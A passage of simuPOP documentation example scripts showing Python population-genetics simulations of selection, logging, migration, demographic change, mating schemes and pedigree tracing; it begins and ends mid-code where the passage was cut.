(freq.index(max_freq), max_freq)\n    return [freq.index(max_freq)]\n\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.6, 0.4]),\n    ],\n    preOps=[\n        sim.MaSelector(fitness=[1, 0.9, 0.8], loci=mostPopular),\n        sim.PyEval(r\"'gen=%d, select against %d with frequency %.2f\\n' % (gen, selLoci[0], selLoci[1])\"),\n    ],\n    matingScheme=sim.RandomMating(),\n    gen=10,\n)\n#end_file\n\n\n\n#begin_file log/output.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(size=1000, loci=2), rep=3)\nsimu.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(genotype=[1, 2, 2, 1])\n    ],\n    matingScheme = sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n    postOps=[\n        sim.Stat(LD=[0, 1]),\n        sim.PyEval(r\"'%.2f\\t' % LD[0][1]\", step=20, output='>>LD.txt'),\n        sim.PyOutput('\\n', reps=-1, step=20, output='>>LD.txt'),\n        sim.PyEval(r\"'%.2f\\t' % R2[0][1]\", output='R2.txt'),\n        sim.PyEval(r\"'%.2f\\t' % LD[0][1]\", step=20, output=\"!'>>LD_%d.txt' % rep\"),\n    ],\n    gen=100\n)\nprint(open('LD.txt').read())\nprint(open('R2.txt').read()) # Only the last write operation succeeds.\nprint(open('LD_2.txt').read()) # Each replicate writes to a different file.\n#begin_ignore\nimport os\nfor file in ['LD.txt', 'LD_0.txt', 'LD_1.txt', 'LD_2.txt', 'R2.txt']:\n    os.remove(file)\n\n#end_ignore\n#end_file\n\n#begin_file log/outputFunc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport logging\n# logging to a file simulation.log, with detailed debug information\nlogging.basicConfig(\n    filename='simulation.log',\n    level=logging.DEBUG,\n    format='%(levelname)s: %(message)s',\n    filemode='w'\n)\nformatter = logging.Formatter('%(message)s')\nlogger = logging.getLogger('')\npop = sim.Population(size=1000, loci=2)\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(genotype=[1, 2, 2, 1])\n    ],\n    matingScheme = 
sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n    postOps=[\n        sim.Stat(LD=[0, 1]),\n        sim.PyEval(r\"'LD: %d, %.2f' % (gen, LD[0][1])\", step=20,\n            output=logger.info), # send LD to console and a logfile\n        sim.PyEval(r\"'R2: %d, %.2f' % (gen, R2[0][1])\", step=20,\n            output=logger.debug), # send R2 only to a logfile\n    ],\n    gen=100\n)\nprint(open('simulation.log').read())\n#begin_ignore\nlogging.shutdown()\nimport os\nos.remove('simulation.log')\n#end_ignore\n#end_file\n\n#begin_file log/transmitter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, loci=2)\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(genotype=[1, 2, 2, 1])\n    ],\n    matingScheme = sim.RandomMating(ops=[\n        sim.MendelianGenoTransmitter(end=29),\n        sim.Recombinator(rates=0.01, begin=30),\n    ]),\n    postOps=[\n        sim.Stat(LD=[0, 1]),\n        sim.PyEval(r\"'gen %d, LD: %.2f\\n' % (gen, LD[0][1])\", step=20)\n    ],\n    gen=100\n)\n#end_file\n\n#begin_file log/hybrid.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef myPenetrance(geno):\n    'A three-locus heterogeneity penetrance model'\n    if sum(geno) < 2:\n        return 0\n    else:\n        return sum(geno)*0.1\n\npop = sim.Population(1000, loci=[20]*3)\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.8, 0.2])\n    ],\n    matingScheme=sim.RandomMating(),\n    postOps=[\n        sim.PyPenetrance(func=myPenetrance, loci=[10, 30, 50]),\n        sim.Stat(numOfAffected=True),\n        sim.PyEval(r\"'%d: %d\\n' % (gen, numOfAffected)\")\n    ],\n    gen = 5\n)\n#end_file\n\n#begin_file log/PyOperator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef dynaMutator(pop, param):\n    '''This mutator mutates common loci with a low mutation rate and rare\n    loci with a high mutation rate, as an attempt to raise the allele frequency\n    of rare loci to a higher level.'''\n    # unpack parameter\n    (cutoff, mu1, mu2) = param;\n    sim.stat(pop, alleleFreq=range(pop.totNumLoci()))\n    for i in range(pop.totNumLoci()):\n        # Get the frequency of allele 1 (disease allele)\n        if pop.dvars().alleleFreq[i][1] < cutoff:\n            sim.kAlleleMutate(pop, k=2, rates=mu1, loci=[i])\n        else:\n            sim.kAlleleMutate(pop, k=2, rates=mu2, loci=[i])\n    return True\n\npop = sim.Population(size=10000, loci=[2, 3])\npop.evolve(\n    initOps=[ \n        sim.InitSex(),\n        sim.InitGenotype(freq=[.99, .01], loci=[0, 2, 4]),\n        sim.InitGenotype(freq=[.8, .2], loci=[1, 3])\n    ],\n    preOps=sim.PyOperator(func=dynaMutator, param=(.2, 1e-2, 1e-5)),\n    matingScheme=sim.RandomMating(),\n    postOps=[\n        sim.Stat(alleleFreq=range(5), step=10),\n        sim.PyEval(r\"' '.join(['%.2f' % alleleFreq[x][1] for x in range(5)]) + '\\n'\",\n            step=10),\n    ],\n    gen = 31\n) \n#end_file\n\n#begin_file log/pyDuringMatingOperator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef rejectInd(off):\n    'reject an individual if off.allele(0) == 1'\n    return off.allele(0) == 0\n\npop = sim.Population(size=100, loci=1)\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.5, 0.5])\n    ],\n    matingScheme=sim.RandomMating(\n        ops=[\n            sim.MendelianGenoTransmitter(),\n            sim.PyOperator(func=rejectInd)\n        ]),\n    gen = 1\n)\n# You should see no individual with allele 1 at locus 0, ploidy 
0.\npop.genotype()[:20]\n#end_file\n\n#begin_file log/funcform.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nfrom simuPOP import InitGenotype, Population\n#begin_ignore\nfrom simuPOP import setRNG\nsetRNG(seed=12345)\n#end_ignore\ndef initGenotype(pop, *args, **kwargs):\n InitGenotype(*args, **kwargs).apply(pop)\n\npop = Population(1000, loci=[2,3])\ninitGenotype(pop, freq=[.2, .3, .5])\n#end_file\n\n#begin_file log/migrSize.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[[0.8, 0.2], [0.4, 0.6]]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n#begin_file log/migrFixedSize.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.Migrator(rate=[[0.8, 0.2], [0.4, 0.6]]),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n matingScheme=sim.RandomMating(subPopSize=[500, 1000]),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n#begin_file log/demoBySelection.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(pop):\n return int(pop.popSize() * 1.05)\n\npop = sim.Population(size=10000, loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.7, 0.3])\n ],\n preOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%d %s --> \" % (gen, subPopSize)'),\n sim.ResizeSubPops(0, proportions=[0.5], at=2),\n sim.MaPenetrance(loci=0, penetrance=[0.01, 0.2, 0.6], begin=4),\n sim.DiscardIf('ind.affected()', exposeInd='ind', begin=4),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s --> \" % subPopSize'),\n ],\n matingScheme=sim.RandomMating(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 6\n)\n#end_file\n\n#begin_file log/demoFunc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(gen):\n return [500 + gen*10, 1000 + gen*10]\n\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[[0.8, 0.2], [0.4, 0.6]]),\n matingScheme=sim.RandomMating(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n#begin_file log/demoFunc1.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef demo(pop):\n return [x + random.randint(50, 100) for x in pop.subPopSizes()]\n\npop = sim.Population(size=[500, 1000], infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'\"%s\\n\" % subPopSize')\n ],\n gen = 3\n)\n#end_file\n\n\n#begin_file log/advancedDemoFunc.py\n#begin_ignore\nimport 
simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(gen, pop):\n if gen < 2:\n return 1000 + 100 * gen\n if gen == 2:\n # this happens right before mating at generation 2\n size = pop.popSize()\n pop.splitSubPop(0, [size // 2, size - size//2]) \n # for generation two and later\n return [x + 50 * gen for x in pop.subPopSizes()]\n\npop = sim.Population(1000)\npop.evolve(\n preOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'"Gen %d:\\t%s (before mating)\\t" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(subPopSize=demo),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval(r'"%s (after mating)\\n" % subPopSize')\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/numOff.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef checkNumOffspring(numOffspring, ops=[]):\n '''Check the number of offspring for each family using\n information field father_idx\n '''\n pop = sim.Population(size=[30], loci=1, infoFields=['father_idx', 'mother_idx'])\n pop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.ParentsTagger(),\n ] + ops,\n numOffspring=numOffspring),\n gen=1)\n # get the parents of each offspring\n parents = [(x, y) for x, y in zip(pop.indInfo('mother_idx'),\n pop.indInfo('father_idx'))]\n # Individuals with identical parents are considered as siblings.\n famSize = []\n lastParent = (-1, -1)\n for parent in parents:\n if parent == lastParent:\n famSize[-1] += 1\n else:\n lastParent = parent\n famSize.append(1)\n return famSize\n\n# Case 1: produce the given number of offspring\ncheckNumOffspring(numOffspring=2)\n# Case 2: Use a Python function\nimport random\ndef func(gen):\n return random.randint(5, 8)\n\ncheckNumOffspring(numOffspring=func)\n# Case 3: A geometric distribution\ncheckNumOffspring(numOffspring=(sim.GEOMETRIC_DISTRIBUTION, 0.3))\n# Case 4: A Poisson distribution\ncheckNumOffspring(numOffspring=(sim.POISSON_DISTRIBUTION, 1.6))\n# Case 5: A Binomial distribution\ncheckNumOffspring(numOffspring=(sim.BINOMIAL_DISTRIBUTION, 0.1, 10))\n# Case 6: A uniform distribution\ncheckNumOffspring(numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 6))\n# Case 7: With selection on offspring\ncheckNumOffspring(numOffspring=8,\n ops=[sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):0.8, (1,1):0.5})])\n#end_file\n\n\n\n#begin_file log/dynamicNumOff.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nimport random\n\nclass RandomNumOff:\n # a demographic model\n def __init__(self):\n self.numOff = []\n \n def getNumOff(self):\n # return the pre-simulated number of offspring as a generator function\n for item in self.numOff:\n yield item\n \n def __call__(self, pop):\n # define __call__ so that a RandomNumOff object is callable.\n #\n # Each male produces from 1 to 3 offspring. 
For a large population, it would be faster to count the\n # number of males once instead of checking the sex of each individual\n self.numOff = [random.randint(1, 3) for ind in pop.individuals() if ind.sex() == sim.MALE]\n # return the total population size\n print('{} mating events with number of offspring {}'.format(len(self.numOff), self.numOff))\n return sum(self.numOff)\n\n\npop = sim.Population(10)\n\n# create a demographic model\nnumOffModel = RandomNumOff()\n\npop.evolve(\n preOps=sim.InitSex(),\n matingScheme=sim.RandomMating(\n # the model will be called before mating to determine\n # family and population size\n subPopSize=numOffModel,\n # the getNumOff function (generator) returns number of offspring\n # for each mating event\n numOffspring=numOffModel.getNumOff\n ),\n gen=3\n)\n\n#end_file\n\n#begin_file log/sexMode.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef checkSexMode(ms):\n '''Check the assignment of sex to offspring'''\n pop = sim.Population(size=[40])\n pop.evolve(initOps=sim.InitSex(), matingScheme=ms, gen=1)\n # return individual sex as a string\n return ''.join(['M' if ind.sex() == sim.MALE else 'F' for ind in pop.individuals()])\n\n# Case 1: sim.NO_SEX (all male, sim.RandomMating will not continue)\ncheckSexMode(sim.RandomMating(sexMode=sim.NO_SEX))\n# Case 2: sim.RANDOM_SEX (sim.MALE/sim.FEMALE with probability 0.5)\ncheckSexMode(sim.RandomMating(sexMode=sim.RANDOM_SEX))\n# Case 3: sim.PROB_OF_MALES (Specify the probability of males)\ncheckSexMode(sim.RandomMating(sexMode=(sim.PROB_OF_MALES, 0.8)))\n# Case 4: sim.NUM_OF_MALES (Specify the number of males in each family)\ncheckSexMode(sim.RandomMating(numOffspring=3, sexMode=(sim.NUM_OF_MALES, 1)))\n# Case 5: sim.NUM_OF_FEMALES (Specify the number of females in each family)\ncheckSexMode(sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 4, 6),\n sexMode=(sim.NUM_OF_FEMALES, 2))\n)\n# Case 6: sim.SEQUENCE_OF_SEX\ncheckSexMode(sim.RandomMating(\n numOffspring=4, sexMode=(sim.SEQUENCE_OF_SEX, sim.MALE, sim.FEMALE))\n)\n# Case 7: sim.GLOBAL_SEQUENCE_OF_SEX\ncheckSexMode(sim.RandomMating(\n numOffspring=3, sexMode=(sim.GLOBAL_SEQUENCE_OF_SEX, sim.MALE, sim.FEMALE))\n)\n# Case 8: A generator function\ndef sexFunc():\n i = 0\n while True:\n i += 1\n if i % 2 == 0:\n yield sim.MALE\n else:\n yield sim.FEMALE\n\ncheckSexMode(sim.RandomMating(numOffspring=3, sexMode=sexFunc))\n#end_file\n\n#begin_file log/monogamous.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(20, infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=sim.InitSex(sex=(sim.MALE, sim.FEMALE)),\n matingScheme=sim.MonogamousMating(\n numOffspring=2,\n sexMode=(sim.NUM_OF_MALES, 1),\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.ParentsTagger(),\n ],\n ),\n gen = 5\n)\n[ind.sex() for ind in pop.individuals()]\n[int(ind.father_idx) for ind in pop.individuals()]\n[int(ind.mother_idx) for ind in pop.individuals()]\n# count the number of distinct parents\nlen(set(pop.indInfo('father_idx')))\nlen(set(pop.indInfo('mother_idx')))\n#end_file\n\n#begin_file log/polygamous.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=sim.InitSex(),\n 
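# polySex=sim.MALE with polyNum=2: each chosen male mates in turn with two\n # females, so consecutive offspring share a father but have different mothers\n 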
matingScheme=sim.PolygamousMating(polySex=sim.MALE, polyNum=2,\n ops=[sim.ParentsTagger(),\n sim.MendelianGenoTransmitter()],\n ),\n gen = 5\n)\n[int(ind.father_idx) for ind in pop.individuals()][:20]\n[int(ind.mother_idx) for ind in pop.individuals()][:20]\n#end_file\n\n#begin_file log/RandomSelection.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, ploidy=1, loci=[5, 5], ancGen=1,\n infoFields='parent_idx')\npop.evolve(\n initOps=sim.InitGenotype(freq=[0.3, 0.7]),\n matingScheme=sim.RandomSelection(ops=[\n sim.ParentsTagger(infoFields='parent_idx'),\n sim.CloneGenoTransmitter(),\n ]),\n gen = 5\n)\nind = pop.individual(0)\npar = pop.ancestor(ind.parent_idx, 1)\nprint(ind.sex(), ind.genotype())\nprint(par.sex(), par.genotype())\n#end_file\n\n\n#begin_file log/HaplodiploidMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10, ploidy=sim.HAPLODIPLOID, loci=[5, 5],\n infoFields=['father_idx', 'mother_idx'])\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*10, subPops=[(0, 'Male')]),\n sim.InitGenotype(genotype=[1]*10+[2]*10, subPops=[(0, 'Female')])\n ],\n preOps=sim.Dumper(structure=False),\n matingScheme=sim.HaplodiploidMating(\n ops=[sim.HaplodiploidGenoTransmitter(), sim.ParentsTagger()]),\n postOps=sim.Dumper(structure=False),\n gen = 1\n)\n#end_file\n\n#begin_file log/SelfMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(20, loci=8)\n# every chromosome is different. 
:-)\nfor idx, ind in enumerate(pop.individuals()):\n ind.setGenotype([idx*2], 0)\n ind.setGenotype([idx*2+1], 1)\n\npop.evolve(\n matingScheme=sim.SelfMating(ops=sim.Recombinator(rates=0.01)),\n gen = 1\n)\nsim.dump(pop, width=3, structure=False, max=10)\n#end_file\n\n#begin_file log/HeteroMatingSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000, 1000], loci=2,\n infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.HeteroMating([\n sim.RandomMating(numOffspring=2, subPops=0,\n ops=[sim.MendelianGenoTransmitter(), sim.ParentsTagger()]\n ),\n sim.RandomMating(numOffspring=4, subPops=1,\n ops=[sim.MendelianGenoTransmitter(), sim.ParentsTagger()]\n )\n ]),\n gen=10\n)\n[int(ind.father_idx) for ind in pop.individuals(0)][:10]\n[int(ind.father_idx) for ind in pop.individuals(1)][:10]\n#end_file\n\n#begin_file log/HeteroMatingVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000], loci=2,\n infoFields=['father_idx', 'mother_idx'])\npop.setVirtualSplitter(sim.ProportionSplitter([0.2, 0.8]))\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.HeteroMating(matingSchemes=[\n sim.SelfMating(subPops=[(0, 0)],\n ops=[sim.SelfingGenoTransmitter(), sim.ParentsTagger()]\n ),\n sim.RandomMating(subPops=[(0, 1)],\n ops=[sim.MendelianGenoTransmitter(), sim.ParentsTagger()]\n )\n ]),\n gen = 10\n)\n[int(ind.father_idx) for ind in pop.individuals(0)][:15]\n[int(ind.mother_idx) for ind in pop.individuals(0)][:15]\n#end_file\n\n#begin_file log/HeteroMatingWeight.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000], loci=2,\n infoFields='mark')\npop.setVirtualSplitter(sim.RangeSplitter([[0, 500], [200, 1000]]))\n\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.HeteroMating([\n sim.RandomMating(subPops=0, weight=-0.5,\n ops=[sim.InfoExec('mark=0'), sim.MendelianGenoTransmitter()]),\n sim.RandomMating(subPops=[(0, 0)], weight=2,\n ops=[sim.InfoExec('mark=1'), sim.MendelianGenoTransmitter()]),\n sim.RandomMating(subPops=[(0, 1)], weight=3,\n ops=[sim.InfoExec('mark=2'), sim.MendelianGenoTransmitter()])\n ]),\n gen = 10\n)\nmarks = list(pop.indInfo('mark'))\nmarks.count(0.)\nmarks.count(1.)\nmarks.count(2.)\n#end_file\n#begin_file log/Simulator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=10)\n# five copies of the same population\nsimu = sim.Simulator(pop, rep=5)\nsimu.numRep()\n# evolve for ten generations and save the populations\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.3, 0.7])\n ],\n matingScheme=sim.RandomMating(),\n finalOps=sim.SavePopulation('!"pop%d.pop"%rep'),\n gen=10\n)\n# load the population and create another Simulator\nsimu = sim.Simulator([sim.loadPopulation('pop%d.pop' % x) for x in range(5)])\n# continue to evolve\nsimu.evolve(\n matingScheme=sim.RandomMating(),\n gen=10\n)\n# print out allele frequency\nfor pop in simu.populations():\n sim.stat(pop, alleleFreq=0)\n print('%.2f' % pop.dvars().alleleFreq[0][0])\n\n# get a population\npop = 
simu.extract(0)\nsimu.numRep()\n#begin_ignore\nimport os\nfor x in range(5):\n os.remove('pop%d.pop' % x)\n\n#end_ignore\n#end_file\n\n\n\n#begin_file log/matingSchemeByRepAndGen.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(1000, loci=[10]), rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.ConditionalMating('rep == 0', \n # the first replicate uses standard random mating\n sim.RandomMating(),\n sim.ConditionalMating('rep == 1 and gen >= 5',\n # the second replicate switches back to standard random mating\n # after the first 5 generations\n sim.RandomMating(),\n # otherwise (the second replicate before generation 5, and the\n # last replicate all the time) produce more males\n sim.RandomMating(sexMode=(sim.PROB_OF_MALES, 0.7))\n )\n ),\n postOps=[\n sim.Stat(numOfMales=True),\n sim.PyEval("'gen=%d' % gen", reps=0),\n sim.PyEval(r"'\\t%d' % numOfMales"),\n sim.PyOutput('\\n', reps=-1)\n ], \n gen=10\n)\n#end_file\n\n#begin_file log/simuGen.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(50, loci=[10], ploidy=1),\n rep=3)\nsimu.evolve(gen = 5)\nsimu.dvars(0).gen\nsimu.evolve(\n initOps=[sim.InitGenotype(freq=[0.5, 0.5])],\n matingScheme=sim.RandomSelection(),\n postOps=[\n sim.Stat(alleleFreq=5),\n sim.IfElse('alleleNum[5][0] == 0',\n sim.PyEval(r"'Allele 0 is lost in rep %d at gen %d\\n' % (rep, gen)")),\n sim.IfElse('alleleNum[5][0] == 50',\n sim.PyEval(r"'Allele 0 is fixed in rep %d at gen %d\\n' % (rep, gen)")),\n sim.TerminateIf('len(alleleNum[5]) == 1'),\n ],\n)\n[simu.dvars(x).gen for x in range(3)]\n#end_file\n\n#begin_file log/describe.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\nimport random\n\ndef outputstat(pop):\n 'Calculate and output statistics, ignored'\n return True\n\n# describe this evolutionary process\nprint(sim.describeEvolProcess(\n initOps=[\n sim.InitSex(),\n sim.InitInfo(lambda: random.randint(0, 75), infoFields='age'),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.IdTagger(),\n sim.PyOutput('Prevalence of disease in each age group:\\n'),\n ],\n preOps=sim.InfoExec('age += 1'),\n matingScheme=sim.HeteroMating([\n sim.CloneMating(subPops=[(0,0), (0,1), (0,2)], weight=-1),\n sim.RandomMating(ops=[\n sim.IdTagger(),\n sim.Recombinator(intensity=1e-4)\n ], subPops=[(0,1)]),\n ]),\n postOps=[\n sim.MaPenetrance(loci=0, penetrance=[0.01, 0.1, 0.3]),\n sim.PyOperator(func=outputstat)\n ],\n gen = 100,\n numRep = 3\n)) \n#end_file\n\n#begin_file log/twoStage.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# First stage: use the standard random mating scheme, do not use any\n# information field for efficiency considerations.\npop = sim.Population(500, loci=[10])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n gen = 50\n)\n# Second stage: track parents and produce more offspring per mating\n# event, 
in preparation for pedigree ascertainment.\npop.addInfoFields(['ind_id', 'father_id', 'mother_id'])\npop.setAncestralDepth(1)\npop.evolve(\n initOps=sim.IdTagger(),\n matingScheme=sim.RandomMating(numOffspring=2, ops=[\n sim.IdTagger(),\n sim.PedigreeTagger(),\n sim.MendelianGenoTransmitter(),\n ]),\n postOps=sim.MaPenetrance(loci=0, penetrance=(0.2, 0.4, 0.5)),\n gen = 5\n)\n# Sample affected sibpairs\nfrom simuPOP.sampling import drawAffectedSibpairSample\nsample = drawAffectedSibpairSample(pop, families=5)\n[int(ind.father_id) for ind in sample.individuals()]\n#end_file\n\n\n#begin_file log/locateRelative.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, ancGen=2, infoFields=['ind_id', 'father_id', 'mother_id'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n matingScheme=sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.IdTagger(),\n sim.PedigreeTagger()\n ],\n ),\n gen = 5\n)\nped = sim.Pedigree(pop)\noffFields = ['off%d' % x for x in range(4)]\ngrandOffFields = ['grandOff%d' % x for x in range(5)]\nped.addInfoFields(['spouse'] + offFields + grandOffFields)\n# only locate female spouses, i.e. record a wife for each father...\nped.locateRelatives(sim.OUTBRED_SPOUSE, ['spouse'], sex=sim.FEMALE_ONLY)\nped.locateRelatives(sim.COMMON_OFFSPRING, ['spouse'] + offFields)\n# trace offspring of offspring\nped.traceRelatives([offFields, offFields], resultFields=grandOffFields)\n# \nIDs = ped.individualsWithRelatives(grandOffFields)\n# check one of the IDs.\ngrandFather = IDs[0]\ngrandMother = ped.indByID(grandFather).spouse\n# some IDs might be invalid.\nchildren = [ped.indByID(grandFather).info(x) for x in offFields]\nchildrenSpouse = [ped.indByID(x).spouse for x in children if x >= 1]\nchildrenParents = [ped.indByID(x).father_id for x in children if x >= 1] \\\n + 